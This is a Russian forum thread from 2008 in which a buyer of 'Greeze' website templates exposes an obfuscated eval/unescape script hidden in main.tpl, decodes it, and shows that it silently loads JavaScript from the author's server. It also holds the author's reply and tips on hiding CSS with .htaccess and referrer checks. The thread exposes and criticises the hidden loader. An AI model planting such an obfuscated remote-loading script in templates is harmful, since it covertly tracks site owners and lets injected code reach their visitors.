Шаблоны от Greeze

[ShVad 2]

Купил шаблон у ·• Greeze •·

Заметил в main.tpl

<script type="text/javascript">scripto='13fhdaptea';eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d(unescape("%08<-\" qqa-vzgv ?gr{v\" vggjqgn{vq ?ngp\" qqa,7{vggilc{-gxggpe-makvrglg-qgvcnrogv- ?dgpj\"ilkn>"));</script>


d(unescape("%08<vrkpaq->< 2?v=rjr,nrv-zzz-vgl,cxggpe--8rvvj ?apq\" vrkpaqctch-vzgv ?gr{v\"vrkpaq>"));</script>

Так называемая защита от рипа (по его словам). Начал редактировать шаб - залил на сервер, а там он отображается без стилей. Решил расковырять скрипты... Раскодил функцию D()... Осталось две строки:

%08<-\" qqa-vzgv ?gr{v\" vggjqgn{vq ?ngp\" qqa,7{vggilc{-gxggpe-makvrglg-qgvcnrogv- ?dgpj\"ilkn>


и


%08<vrkpaq->< 2?v=rjr,nrv-zzz-vgl,cxggpe--8rvvj ?apq\" vrkpaqctch-vzgv ?gr{v\"vrkpaq>

Идем далее: Первая строка:

<link href="/templates/eneptico/greeze/файл стиля.css" rel="stylesheet" type="text/css" />

Поверим... Пусть называется защитой от рипа... Вторая строка!:

<script type="text/javascript" src="http://greeza.net/xxx/tpl.php?t=0"></script>

Делайте выводы... Скрин PHP файла...

Давайте спросим у Greeze что он скринит к нашим сайтам...

Изменено 29 января 2008 пользователем ShVad

[Zdraff 4]

Интересненько . Ну пусть прокомментирует. Врядли же можно быть таким глупым, чтоб одной такой вот фигней взять и поставить крест на своей репутации.

[empirator 0]

<script type="text/javascript" src="http://greeza.net/xxx/tpl.php?t=0"></script>

Давайте спросим у Greeze что он скринит к нашим сайтам...

Greeze, что Ты скринишь к их сайтам?

А серьезно: не раз сталкивался, когда в закодированных скриптах вшивали <iframe>'ы с самым разным наполнением. Чаще всего - разгон трафа, но могут и дрянь какую-нибудь подсунуть. Неприятно...

А с Greeze'ом ни разу не работал, не могу ничего сказать.

[Zdraff 4]

ну, по-всякому этих инклудов быть не должно.

[n0lik 75]

Вообщем в чёрный список его шаблоны надо заносить, вот и всё...

[ShVad 2]

Шаблоны если поправить - норм смотрятся.

Но src="http://greeza.net/xxx/tpl.php?t=0" ...

[lifestar 18]

Решил расковырять скрипты...

Раскодил функцию D()...

Первая строка:

Код

<link href="/templates/eneptico/greeze/файл стиля.css" rel="stylesheet" type="text/css" />

·• Greeze •· нет смысла так легко защищать месторасположение файла стилей, прочнее через .htaccess - да и "палева" перед "клиентами" нет)

Изменено 29 января 2008 пользователем lifestar

[t0rn 0]

включаем в апаче mod_rewrite создаем в папке с темплейтом файл .htaccess c содержимым (у меня так прописано)

<FilesMatch "(\.(engine|.*sql|templates|tpl(\.php)?|xtmpl))$">

Order allow,deny

</FilesMatch>

Order Deny,Allow

Allow from all

[Greeze 0]

всем спасибо за отзывы

shvad, тебе отдельный, огромнейший респект.

а теперь по порядку.

Так называемая защита от рипа (по его словам).

это защита от малолеток рипперов, которые не в состоянии раскодировать js файл (а таких предостаточно).

суть кодирования таится в скрытии путя до css файла.

Начал редактировать шаб - залил на сервер, а там он отображается без стилей.

надо внимательнее читать readme, а именно:

В шаблон установлена "защита от рипа", поэтому не меняйте имя папки шаблона, иначе слетит css.

Вторая строка!:

это скрипт собирающий урлы сайтов, куда был установлен шаб.

изучал js на досуге, встроил ради интереса.

если сделать запрос по урлу то вы увидите, что скрипт возвращает пустой js файл.

пакостить никому не собирался, и уж тем более встраивать какие-нибудь бэкдоры

всем спасибо за внимание.

·• Greeze •· нет смысла так легко защищать месторасположение файла стилей, прочнее через .htaccess - да и "палева" перед "клиентами" нет)

Расскажи пожалуйста поподробнее, как можно защитить файл стилей.

Изменено 29 января 2008 пользователем ·• Greeze •·

[lifestar 18]

Расскажи пожалуйста поподробнее, как можно защитить файл стилей.

выше уже привели пример.

Есть и другой способ

RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?lifestar.ru [NC]

RewriteRule \.(css)$ - [NC,F,L]

где lifestar.ru - домен где установлен шаблон. Есть и ещё один способ. Сам CSS отдавать при помощи PHP, то есть

<link href="/templates/eneptico/greeze/css.php" rel="stylesheet" type="text/css" />

в самом css.php проверять реффер и ай пи

t0rn, ваш способ у меня не сработал

[Greeze 0]

в кэше файл все равно сохранится(.

[ShVad 2]

·• Greeze •·,

Я могу написать тебе скрипт который по реферам будет выдавать стили.

[lifestar 18]

в кэше файл все равно сохранится

вот специально для тебя http://www.stefanhayden.com/blog/2006/04/0...s-caching-hack/

[ChatMaster 3]

Ну да, а если я зайду с Outpost'ом, в котором глобально отключена передача HTTP_REFERRER?

Реф - это жутко ненадёжная штука, на неё полагаться совершенно нельзя.

К тому же, HttpWatch для осла или FireBug для огнелиса убивают такую "защиту" на корню

Так что, не страдайте фигнёй.

[Greeze 0]

посчет рефов согласен.. тем боле что значение можно подменить.

другое дело, я не преследовал цели точно знать, где установлен шаблон.

фигней мы не страдаем, мы занимаемся самообучением..)

[lifestar 18]

Так что, не страдайте фигнёй.

Как раз и не понимаю зачем так "извращаться". Не знаю ни одного реально действенного способа защитить свой шаблон и в частности файл стилей. Если вы знаете - говорите, будет открывать) Изменено 13 февраля 2008 пользователем lifestar

[-=Kostya=- 0]

Нет такой защиты, с помощью которой можно было бы защитить шаблон от воровства. Кому нужно даже со скриншота сверстает. Я было удивлялся, почему с промо-скриншотов в натуральный размер готовящихся сайтов уже появляются сверстанные шаблоны... Потом подсказали.

Считаю что прятать CSS нет смысла. Как правило у малолеток-рипперов не хватит мозгов ковырять CSS. C таблицами им проще, значительно. Если же хочется совсмем «заебать» ворюгу, то можно сделать компрессию CSS, после чего глаза могут «повеситься» не усли конечно ворюга не знает про форматирование CSS кода в дримвиевере

Пример сжатого CSS:

h1,h2,h3,h4{font-weight:lighter;margin:0.7em 0 0.5em 0;color:#FFFFFF}h1 a,h2 a,h3 a,h4 a{color:#365c96;text-decoration:none;color:#FFFFFF}h1 a:link,h2 a:link,h3:link a,h4:link a{color:#FFFFFF;text-decoration:none}h1 a:hover,h2 a:hover,h3 a:hover,h4 a:hover{color:#990003;text-decoration:underline}h1 a:visited,h2 a:visited,h3 a:visited,h4 a:visited{color:#FFFFFF}h1{font-size:2.0em}h2{font-size:1.7em;margin:0.4em 0 0.3em 0}h3{font-size:1.4em}h4{font-size:1.2em}a{color:#ff8334;text-decoration:underline}a:link{color:#ff8334;text-decoration:underline}a:hover{color:#990003;text-decoration:underline}a:visited,a:active{color:#ff8334}

Сам компрессор тут.

[lifestar 18]

Kostya, компрессор - хорошо. Но он нужен для убыстрения загрузки страницы, а не для защиты.

А так можно написать php скрипт, который сам приведёт сжатый вид к нормальному аля

class{

color: #fff;

}

[Greeze 0]

можно еще символы заменить

например вот такой код:

<div id="container">

заменить на:

#60;div id="container"#62;

вес файлов увеличится, но зато на быстродействии это ни коем образом не скажется.

да и рипать тяжело будет

не подскажете норм софтину, способную так извратнуться над кодом?)

css обычно просто копируют, защищать нет смысла

Изменено 13 февраля 2008 пользователем ·• Greeze •·

[-=Kostya=- 0]

lifestar,

я предложил вариант компрессии кода лишь для путанницы:

Если же хочется совсмем «заебать» ворюгу, то можно сделать компрессию CSS, после чего глаза могут «повеситься» не усли конечно ворюга не знает про форматирование CSS кода в дримвиевере

хотя конечно же понимаю что такой способ защиты не катит. Нет такой защиты от которой можно защитится.

Greeze,

это в дримвиевере делается.

[Greeze 0]

это в дримвиевере делается.

ага, спс.)

надо бы поставить, а то я в основном в блокноте шабашу..)

[-=Kostya=- 0]

Говорил бы что блокнот у тебя с подсветкой кода, с определением где теги не закрыты, с css-редактором и вообще что ты дримвиевер или хоумсайт блокнотом называешь... Отпонтовался ))

[Greeze 0]

нее..) я парень порядочный, можешь поверить..)

недавно поставил notepad++, а раньше все делал в wordpad'e (шабы м3-м5 сверстаны именно в нем).

сам то какой софт насилуешь?